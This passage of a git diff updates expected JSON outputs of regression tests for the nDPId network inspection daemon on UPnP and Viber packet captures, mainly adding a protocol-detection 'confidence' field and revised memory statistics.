 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 160 chars
-~~ json string max len.......: 682 chars
-~~ json string avg len.......: 491 chars
+~~ json string max len.......: 696 chars
+~~ json string avg len.......: 498 chars
diff --git a/test/results/upnp.pcap.out b/test/results/upnp.pcap.out
index aed6025a4..73d1bc983 100644
--- a/test/results/upnp.pcap.out
+++ b/test/results/upnp.pcap.out
@@ -7,9 +7,9 @@
 01305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1541515315006,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"ts_msec":1541515315006,"pkt":"AQBef\/\/6GNvyL6AYCABFAAKsCtcAAAERvoXAqD1C7\/\/\/+uYzDnYCmBmmPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48c29hcDpFbnZlbG9wZSB4bWxuczpzb2FwPSJodHRwOi8vd3d3LnczLm9yZy8yMDAzLzA1L3NvYXAtZW52ZWxvcGUiIHhtbG5zOndzYT0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNC8wOC9hZGRyZXNzaW5nIiB4bWxuczp3c2Q9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5Ij48c29hcDpIZWFkZXI+PHdzYTpUbz51cm46c2NoZW1hcy14bWxzb2FwLW9yZzp3czoyMDA1OjA0OmRpc2NvdmVyeTwvd3NhOlRvPjx3c2E6QWN0aW9uPmh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5L1Jlc29sdmU8L3dzYTpBY3Rpb24+PHdzYTpNZXNzYWdlSUQ+dXJuOnV1aWQ6M2Y0MmRjOWEtMjRjZS00OGQxLTg4ZjktMTZiOTZhMTM3ZDcxPC93c2E6TWVzc2FnZUlEPjwvc29hcDpIZWFkZXI+PHNvYXA6Qm9keT48d3NkOlJlc29sdmU+PHdzYTpFbmRwb2ludFJlZmVyZW5jZT48d3NhOkFkZHJlc3M+dXJuOnV1aWQ6ZTMyNDgwMDAtODBjZS0xMWRiLTgwMDAtMDAxYmE5OWVjOTU2PC93c2E6QWRkcmVzcz48L3dzYTpFbmRwb2ludFJlZmVyZW5jZT48L3dzZDpSZXNvbHZlPjwvc29hcDpCb2R5Pjwvc29hcDpFbnZlbG9wZT4="}
 01331{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1541515315178,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":718,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":718,"pkt_l4_len":664,"ts_msec":1541515315178,"pkt":"MzMAAAAMGNvyL6AYht1gDeGUApgRAf6AAAAAAAAANEE9JG0wqAf\/AgAAAAAAAAAAAAAAAAAM5jQOdgKYg108P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\/Pjxzb2FwOkVudmVsb3BlIHhtbG5zOnNvYXA9Imh0dHA6Ly93d3cudzMub3JnLzIwMDMvMDUvc29hcC1lbnZlbG9wZSIgeG1sbnM6d3NhPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0LzA4L2FkZHJlc3NpbmciIHhtbG5zOndzZD0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkiPjxzb2FwOkhlYWRlcj48d3NhOlRvPnVybjpzY2hlbWFzLXhtbHNvYXAtb3JnOndzOjIwMDU6MDQ6ZGlzY292ZXJ5PC93c2E6VG8+PHdzYTpBY3Rpb24+aHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkvUmVzb2x2ZTwvd3NhOkFjdGlvbj48d3NhOk1lc3NhZ2VJRD51cm46dXVpZDozZjQyZGM5YS0yNGNlLTQ4ZDEtODhmOS0xNmI5NmExMzdkNzE8L3dzYTpNZXNzYWdlSUQ+PC9zb2FwOkhlYWRlcj48c29hcDpCb2R5Pjx3c2Q6UmVzb2x2ZT48d3NhOkVuZHBvaW50UmVmZXJlbmNlPjx3c2E6QWRkcmVzcz51cm46dXVpZDplMzI0ODAwMC04MGNlLTExZGItODAwMC0wMDFiYTk5ZWM5NTY8L3dzYTpBZGRyZXNzPjwvd3NhOkVuZHBvaW50UmVmZXJlbmNlPjwvd3NkOlJlc29sdmU+PC9zb2FwOkJvZHk+PC9zb2FwOkVudmVsb3BlPg=="}
 01305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1541515315356,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"ts_msec":1541515315356,"pkt":"AQBef\/\/6GNvyL6AYCABFAAKsCtgAAAERvoTAqD1C7\/\/\/+uYzDnYCmBmmPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48c29hcDpFbnZlbG9wZSB4bWxuczpzb2FwPSJodHRwOi8vd3d3LnczLm9yZy8yMDAzLzA1L3NvYXAtZW52ZWxvcGUiIHhtbG5zOndzYT0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNC8wOC9hZGRyZXNzaW5nIiB4bWxuczp3c2Q9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5Ij48c29hcDpIZWFkZXI+PHdzYTpUbz51cm46c2NoZW1hcy14bWxzb2FwLW9yZzp3czoyMDA1OjA0OmRpc2NvdmVyeTwvd3NhOlRvPjx3c2E6QWN0aW9uPmh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5L1Jlc29sdmU8L3dzYTpBY3Rpb24+PHdzYTpNZXNzYWdlSUQ+dXJuOnV1aWQ6M2Y0MmRjOWEtMjRjZS00OGQxLTg4ZjktMTZiOTZhMTM3ZDcxPC93c2E6TWVzc2FnZUlEPjwvc29hcDpIZWFkZXI+PHNvYXA6Qm9keT48d3NkOlJlc29sdmU+PHdzYTpFbmRwb2ludFJlZmVyZW5jZT48d3NhOkFkZHJlc3M+dXJuOnV1aWQ6ZTMyNDgwMDAtODBjZS0xMWRiLTgwMDAtMDAxYmE5OWVjOTU2PC93c2E6QWRkcmVzcz48L3dzYTpFbmRwb2ludFJlZmVyZW5jZT48L3dzZDpSZXNvbHZlPjwvc29hcDpCb2R5Pjwvc29hcDpFbnZlbG9wZT4="}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":14,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1541515314826,"flow_last_seen":1541515320458,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":4592,"flow_avg_l4_payload_len":656,"midstream":0,"ts_msec":1541515321472,"l3_proto":"ip6","src_ip":"fe80::3441:3d24:6d30:a807","dst_ip":"ff02::c","src_port":58932,"dst_port":3702,"l4_proto":"udp","ndpi": {"proto":"WSD","breed":"Acceptable","category":"Network"}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":14,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1541515314826,"flow_last_seen":1541515320458,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":4592,"flow_avg_l4_payload_len":656,"midstream":0,"ts_msec":1541515321472,"l3_proto":"ip6","src_ip":"fe80::3441:3d24:6d30:a807","dst_ip":"ff02::c","src_port":58932,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"WSD","breed":"Acceptable","category":"Network"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1541515314826,"flow_last_seen":1541515320458,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":4592,"flow_avg_l4_payload_len":656,"midstream":0,"ts_msec":1541515321472,"l3_proto":"ip6","src_ip":"fe80::3441:3d24:6d30:a807","dst_ip":"ff02::c","src_port":58932,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":14,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1541515314827,"flow_last_seen":1541515321472,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":4592,"flow_avg_l4_payload_len":656,"midstream":0,"ts_msec":1541515321472,"l3_proto":"ip4","src_ip":"192.168.61.66","dst_ip":"239.255.255.250","src_port":58931,"dst_port":3702,"l4_proto":"udp","ndpi": {"proto":"WSD","breed":"Acceptable","category":"Network"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":14,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1541515314827,"flow_last_seen":1541515321472,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":4592,"flow_avg_l4_payload_len":656,"midstream":0,"ts_msec":1541515321472,"l3_proto":"ip4","src_ip":"192.168.61.66","dst_ip":"239.255.255.250","src_port":58931,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"WSD","breed":"Acceptable","category":"Network"}}
 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1541515314827,"flow_last_seen":1541515321472,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":4592,"flow_avg_l4_payload_len":656,"midstream":0,"ts_msec":1541515321472,"l3_proto":"ip4","src_ip":"192.168.61.66","dst_ip":"239.255.255.250","src_port":58931,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00153{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"upnp.pcap","alias":"nDPId-test","total-events-serialized":14}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -20,9 +20,9 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4596435 bytes
-~~ total memory freed........: 4596435 bytes
-~~ total allocations/frees...: 99570/99570
+~~ total memory allocated....: 4681060 bytes
+~~ total memory freed........: 4681060 bytes
+~~ total allocations/frees...: 101160/101160
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 158 chars
 ~~ json string max len.......: 1336 chars
diff --git a/test/results/viber.pcap.out b/test/results/viber.pcap.out
index 9324b68a1..7a39cbbe6 100644
--- a/test/results/viber.pcap.out
+++ b/test/results/viber.pcap.out
@@ -3,101 +3,101 @@
 00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1527155638428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"ts_msec":1527155638428,"pkt":"AA6OMNv9MAdNo1+nCABFAACZvbBAAEAGio\/AqAARNAD9ZYG4EJTYH5QATQ0UaIAYAtokAwAAAQEICgAhYEL3kz3SZQAKAAAALtCh9tIA1PL3FQOheV4He+mBM0W\/i9pTb10sHI+OMXtBs1b9JHGGgzJlSCkVK80QeHWJMpbzU2NcxAJaXXoLguc1CK5osKkCx6zZTIH0SZ0piWwLO+YlPXpdR9T6nHw="}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155638474,"flow_last_seen":1527155638474,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1527155638474,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1527155638474,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1527155638474,"pkt":"AA6OMNv9MAdNo1+nCABFAABAHQZAAEARnDbAqAARwKgAD7KvADUALIZ64YMBAAABAAAAAAAABWdyYXBoCGZhY2Vib29rA2NvbQAAAQAB"}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155638474,"flow_last_seen":1527155638474,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1527155638474,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155638474,"flow_last_seen":1527155638474,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1527155638474,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1527155638476,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1527155638476,"pkt":"MAdNo1+nAA6OMNv9CABFAAC9W3xAAEARXUPAqAAPwKgAEQA1sq8AqYax4YOBgAABAAMAAgACBWdyYXBoCGZhY2Vib29rA2NvbQAAAQABwAwABQABAAAK\/QAGA2FwacASwDAABQABAAADcAAMBHN0YXIEYzEwcsASwEIAAQABAAAAIgAEHw1WCMBHAAIAAQAAChUABwFiAm5zwEfARwACAAEAAAoVAAQBYcBswH0AAQABAAAKFQAERavvC8BqAAEAAQAAChUABEWr\/ws="}
-00754{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155638474,"flow_last_seen":1527155638476,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1527155638476,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":1,"num_answers":7,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.86.8"}}
+00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155638474,"flow_last_seen":1527155638476,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1527155638476,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":1,"num_answers":7,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.86.8"}}
 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1527155638483,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"ts_msec":1527155638483,"pkt":"AA6OMNv9MAdNo1+nCABFAABsvbFAAEAGirvAqAARNAD9ZYG4EJTYH5RlTQ0UaIAYAtrUUgAAAQEICgAhYFH3kz3SOAALAAAAldaoLlKjmwog1MjwGSIlPYr6Sdpf8civ07lgAXs3mNLP4I1IauuXnWuqSM\/O114Rmek="}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1527155638524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1527155638524,"pkt":"MAdNo1+nAA6OMNv9CABFAAA0M+hAACYGLr00AP1lwKgAERCUgbhNDRRo2B+UZYAQAIxrZwAAAQEICveUYGsAIWBC"}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639005,"flow_last_seen":1527155639005,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1527155639005,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1527155639005,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155639005,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8HWBAAEARm+DAqAARwKgAD4nTADUAKI8By5wBAAABAAAAAAAAA2FwcAZhZGp1c3QDY29tAAABAAE="}
-00736{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639005,"flow_last_seen":1527155639005,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1527155639005,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Advertisement"},"dns": {"query":"app.adjust.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639005,"flow_last_seen":1527155639005,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1527155639005,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"},"dns": {"query":"app.adjust.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00774{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1527155639008,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"ts_msec":1527155639008,"pkt":"MAdNo1+nAA6OMNv9CABFAAEhW4BAAEARXNvAqAAPwKgAEQA1idMBDcumy5yBgAABAAQABAAEA2FwcAZhZGp1c3QDY29tAAABAAHADAABAAEAAAHMAASyots6wAwAAQABAAABzAAEsqLbmcAMAAEAAQAAAcwABLKi2LPADAABAAEAAAHMAAS5l8wIwBAAAgABAAKIXQATBG5zMDEGYWRqdXN0BXdvcmtzAMAQAAIAAQACiF0AFARkbnMxA3AwOQVuc29uZQNuZXQAwBAAAgABAAKIXQAHBGRuczLAkMAQAAIAAQACiF0ABwRuczAywHHAiwABAAEAAWUPAATGMywJwKsAAQABAAFlDwAExjMtCcBsAAEAAQAAMG8ABC02EQHAvgABAAEAADBvAAQtNhFB"}
-00755{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155639005,"flow_last_seen":1527155639008,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":261,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1527155639008,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Advertisement"},"dns": {"query":"app.adjust.com","num_queries":1,"num_answers":12,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"178.162.219.58"}}
+00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155639005,"flow_last_seen":1527155639008,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":261,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1527155639008,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"},"dns": {"query":"app.adjust.com","num_queries":1,"num_answers":12,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"178.162.219.58"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639234,"flow_last_seen":1527155639234,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1527155639234,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1527155639234,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1527155639234,"pkt":"AA6OMNv9MAdNo1+nCABFAABAHWRAAEARm9jAqAARwKgAD\/WYADUALODJ\/WMBAAABAAAAAAAABG1hcGkJYXBwdGltaXplA2NvbQAAAQAB"}
-00734{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639234,"flow_last_seen":1527155639234,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1527155639234,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mapi.apptimize.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639234,"flow_last_seen":1527155639234,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1527155639234,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mapi.apptimize.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00873{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1527155639237,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"ts_msec":1527155639237,"pkt":"MAdNo1+nAA6OMNv9CABFAAFnW5VAAEARXIDAqAAPwKgAEQA19ZgBU\/qk\/WOBgAABAAkABAABBG1hcGkJYXBwdGltaXplA2NvbQAAAQABwAwABQABAAAKmgACwBHAEQABAAEAAAA7AAQ2RabiwBEAAQABAAAAOwAENrtbtsARAAEAAQAAADsABCLf10HAEQABAAEAAAA7AAQjoIExwBEAAQABAAAAOwAEI6WM3sARAAEAAQAAADsABCOitm\/AEQABAAEAAAA7AAQ2RVffwBEAAQABAAAAOwAENrpW+MARAAIAAQAAA2AAGQducy0xODgzCWF3c2Rucy00MwJjbwJ1awDAEQACAAEAAANgABcHbnMtMTEyOQlhd3NkbnMtMTMDb3JnAMARAAIAAQAAA2AAFgZucy02ODUJYXdzZG5zLTIxA25ldADAEQACAAEAAANgABMGbnMtNDczCWF3c2Rucy01OcAbwSgAAQABAAADYAAEzfvB2Q=="}
